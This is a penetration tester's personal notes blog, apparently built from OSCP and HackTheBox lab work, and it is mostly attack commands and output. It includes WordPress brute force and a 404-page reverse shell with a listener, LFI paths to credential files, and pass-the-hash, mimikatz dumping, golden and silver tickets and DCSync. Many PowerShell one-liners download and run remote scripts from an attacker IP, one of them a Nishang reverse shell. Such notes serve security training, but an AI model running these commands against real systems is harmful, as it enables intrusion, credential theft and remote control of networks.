Author: usafitz

Uncategorized

NOTES_web_enumeration

DIRB

With Proxy (-P) and output (-o)

CommandDescription
dirb http://ipGeneric Search
dirb http://10.11.1.222 -P 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txtUsing Proxy

GOBUSTER

With directory scan (dir) and subnet scan (vhost)

CommandDescription
gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txtDirectory
gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domainVHOST

DIRBUSTER

Dirbuster is a GUI for directory enumeration

CommandDescription
dirbusterStart GII

WORDLISTS

CommandDescription
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txtDirectory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txtExtensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txtDomain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txtParameters Wordlist

CREATE WORDLISTS

CommandDescription
cewl -w searchWordlists.txt -d2 -m 3 search.htbCewl on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey?Use a List
Axel is a command-line-based download accelerator for LinuxAxel

ENUMERATION

CommandDescription
whatweb 10.11.1.101Cewl on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey?Use a List
Axel is a command-line-based download accelerator for LinuxAxel

GOOGLE BOTS

Place into your user agent

CommandDescription
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)Newer version
Googlebot/2.1 (+http://www.google.com/bot.html)Older version

WORDPRESS

Particular attacks to wordpress

CommandDescription
wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames adminBrute Force
[!] Valid Combinations Found: Username: admin, Password: passwordGood Result
https://www.hackingarticles.in/wordpress-reverse-shell/Reference
CHANGE 404 PAGE - PANEL --> APEARANCE --> EDITORPath to Replace 404
curl http://10.11.1.234/wp-content/themes/twentytwelve/404.phpTrigger Reverse Shell
nc -nvlp 80Setup Listener
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.phpCommon Reverse Shell

LFI / RFI

Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following list are common operating system files

CommandDescription
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.iniExample
C:\windows\win.iniWindows
C:\windows\system.iniWindows
C:\windows\iis.logWindows
C:\windows\System32\Drivers\etc\hostsWindows
C:\Windows\system32\config\SYSTEMWindows
C:\windows\debug\netsetup.logWindows
C:\windows\debug\sammui.logWindows
C:\windows\debug\netlogon.logWindows
C:\windows\debug\passwd.logWindows
C:\windows\system32\winevt\logs\system.evtxWindows
C:\windows\system32\winevt\logs\Windows Powershell.evtxWindows
C:\windows\WindowsUpdate.logWindows
C:\windows\system32\calc.exeWindows
C:\windows\system32\windowspowershell\v1.0\powershell.exeWindows
C:\windows\ccm\logs\filesystemfile.logWindows
C:\users\administrator\appdata\local\recently-used.xbelWindows
C:\users\administrator\desktop\desktop.iniWindows
C:\windows\panther\unattended.xmlWindows
C:\windows\panther\unattended\unattended.xmlWindows
C:\windows\repair\samWindows
C:\windows\system32\tasks\dailyWindows
C:\windows\panther\sysprep.infWindows
/etc/passwdLinux
/etc/shadowLinux
/etc/crontabLinux

WORDPRESS CREATE REVERSE SHELL 404 PAGE

└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

└─$ 
└─$                                                                 
listening on [any] 80 ...
connect to [192.168.119.188] from (UNKNOWN) [10.11.1.234] 42095
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
 00:42:17 up  4:23,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
\$ 
OR
└─$ sudo apt install seclists
└─$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
UPLOAD, INSTALL, AND ACTIVATE

CURL -i, –include (HTTP FTP) Include response headers in the output. HTTP response headers can include things like server name, cookies, date of the document, HTTP version and more… With non-HTTP protocols, the “headers” are other server communication. curl -i ip curl -i http://ip curl -i http://url.com

BURPSUITE

BURPSUITE:
/etc/hosts ---> add found links to it (like DNS)
INTRUDER - create a payload for various inputs
REPEATER - change the request or reply
ALWAYS CHECK THE BOX FOR INTERCEPT RESPONSE
Uncategorized

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

====================================================== TGT USE WITH AUTHENTICATION └─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345 └─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected] ====================================================== CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE: PS C:Userscomputer.corp> net accounts └─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 └─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz └─$ crackmapexec smb 10.10.1.299 -u administrator -H'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam └─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd └─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299 └─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299 └─$ rdesktop 10.10.1.299 -u user03 -p password12345 C:tmp>.psexec.exe \dc-dc01 cmd.exe (MAYBE...) THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe ====================================================== SCRIPTS SERVICE ACCOUNTS IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1') LIST USERS IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1') LIST EVERYTHING IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1') SPECIFY A NAME BY CHANGING THE SCRIPT IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1') POWERVIEW IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1') CHECK CREDENTIALS BY CHANGING THE SCRIPT IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY KERBEROAST IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1') REVERSE SHELL (NISHANG) IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1') ====================================================== KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR) IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1') Invoke-Kerberoast -outputformat hashcat | fl └─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt ====================================================== CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE) python3 dnstool.py -u 'intelligencetiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154 VERIFY └─$ nslookup > server 10.129.95.154 > webstuff.intelligence.htb ====================================================== IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE) └─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb LOOKING FOR SERVICE ACCOUNT HASH DUMPS THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT svc_int$:::16cba97b4bc423795585b0b4bcee5047 ====================================================== TIME SYNC └─$ timedatectl set-ntp false └─$ sudo rdate -n dc.intelligence.htb OPTIONAL: sudo ntpdate 10.129.95.154 ====================================================== DC SYNC mimikatz # lsadump::dcsync /user:Administrator ====================================================== SILVER TICKET USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$) └─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH └─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected] ====================================================== GOLDEN BUT NOT GOLDEN TICKET C:>whoami /user (LOOKING FOR SID) mimikatz # kerberos::purge mimikatz # kerberos::list mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt mimikatz # kerberos::list READOUT TO GOLDEN: /user /domain /sid /target /service:HTTP /rc4 NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST ====================================================== GOLDEN TICKET C:Toolsactive_directory> psexec.exe \dc01 cmd.exe ACCESS DENIED WHICH CACHES THE HASH mimikatz # privilege::debug mimikatz # lsadump::lsa /patch mimikatz # kerberos::purge mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt mimikatz # misc::cmd C:Usersuser02.crop> psexec.exe \dc01 cmd.exe ====================================================== DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT) SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK $com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) $com | Get-Member CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD) Sub mymacro() Shell ("notepad.exe") End Sub SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO $Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop" $temp = [system.io.directory]::createDirectory($Path) $com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) $LocalPath = "C:Usersuser05_admin.corpmyexcel.xls" $RemotePath = "\192.168.1.110c$myexcel.xls" [System.IO.File]::Copy($LocalPath, $RemotePath, $True) $Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop" $temp = [system.io.directory]::createDirectory($Path) $Workbook = $com.Workbooks.Open("C:myexcel.xls") $com.Run("mymacro") ====================================================== SERVICE TICKET REQUEST mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::tickets PS C:tmp> Add-Type -AssemblyName System.IdentityModel PS C:tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com' PS C:tmp> klist THEN MIMIKATS sekurlsa::tickets - we see the ticket for HTTP kerberos::list /export THEN SEND THE FILE TO ATTACK COMPUTER PS C:tmp> copy .2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \192.168.119.299share THEN CRACK └─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi CRACK WITH JOHN OR HASHCAT kirbi2john mssql.kirbi > mssql.hash john mssql.hash hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt ====================================================== POWERVIEW IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1') Get-NetSession -ComputerName client06 (WORKED) Get-NetLoggedon -ComputerName client06 (WORKED) ====================================================== RESPONDER └─$ sudo responder -I tun0 THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION PS C:tmptickets> net use \192.168.119.299share /USER:domain.comuser04 ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!! PS C:tmptickets> net use \192.168.119.299share MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.comuser03) ====================================================== BLOODHOUND └─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All sudo neo4j console BLOUDHOUND GUI - CHANGE PASSWORD http://localhost:7474 bloodhound IMPORT THE JSON FILES ====================================================== SMB FILE MOVEMENT AUTHENTICATE: PS C:tmptickets> net use \192.168.119.299share student /USER:student MOVE FILES: PS C:tmptickets> copy .FILE.kirbi \192.168.119.299share TO STOP THE SHARE: net use \192.168.119.299share /DELETE ====================================================== AD SCRIPT REFERENCE ALL ACCOUNTS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="samAccountType=805306368" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } Write-Host "------------------------" } AD SCRIPT REFERENCE SERVICE ACCOUNTS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="serviceprincipalname=*http*" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } } AD SCRIPT REFERENCE LIST USERS ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="samAccountType=805306368" $Searcher.FindAll() AD SCRIPT REFERENCE CHANGE SCRIPT TO GET A CERTAIN NAME ------------------- IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1') ------------------- $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="name=Domain Admins" $Searcher.FindAll()

Uncategorized

Attack Tools

ATTACK TOOLS

…tools and uses vary
…take a look at the use of each before attempting

Continue reading

Uncategorized

Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors

Continue reading

Uncategorized

Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user
FINISH SESSION: Ctl + ] / close
VULN - SHELLSHOCK - need valid email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP
143 - IMAP
587 - SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111 - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
---------------------------------------------------------------
CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------

Continue reading

Uncategorized

Generic Remote Enumeration

All listed items are separate commands unless otherwise specified…

NMAP – STANDARD FIRST APPROACH

…if sudo is required, it will let you know
…otherwise, just use the pasted command

nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt ip
nmap -A -T4 -p- -sS -OA -oN nmap_10.10.1.299.txt ip
nmap -sU --top-ports 100 -vv ip
nmap -sV -vv -p <ports> --script vuln ip

Continue reading

Uncategorized

SQL & SQL Injection

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

Continue reading

Uncategorized

Linux System Enumeration

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

SIMPLE LINUX ENUMERATION

cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat wpconfig.php

Continue reading

Uncategorized

Windows System Enumeration

SIMPLE WINDOWS ENUMERATION

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

SystemInfo
Network Users and Statistics
Firewall
Services and Tasks
Powershell Policy Unrestricted
View Hotfixes
List Domain Controller
Searches on Windows
Find Modules
PowerUp.ps1
Kerberoast
Juicy Potato
Inspect Files and Folders
Directory Enumeration
One-Liner Ping Script
Change Passwords
Unquoted Service Path
Crackmapexec
Brute-Force Examples
Credential Reuse
PsExec Connections
RPC
Remote Desktop
SQL
Common Enumeration Tools
Enable Windows Installer
SAM Dumps
File Transfers
Anti-Virus Evasion
Restart Windows

Continue reading

Uncategorized

SMB Server Enumeration

FIND SMB VERSION

…this can be done using wireshark
…or the techniques seen below

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

enum4linux -a ip
nbtscan ip

…keeping this for reference… used in a particular technique for SMB v2

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.

Continue reading

Scroll to top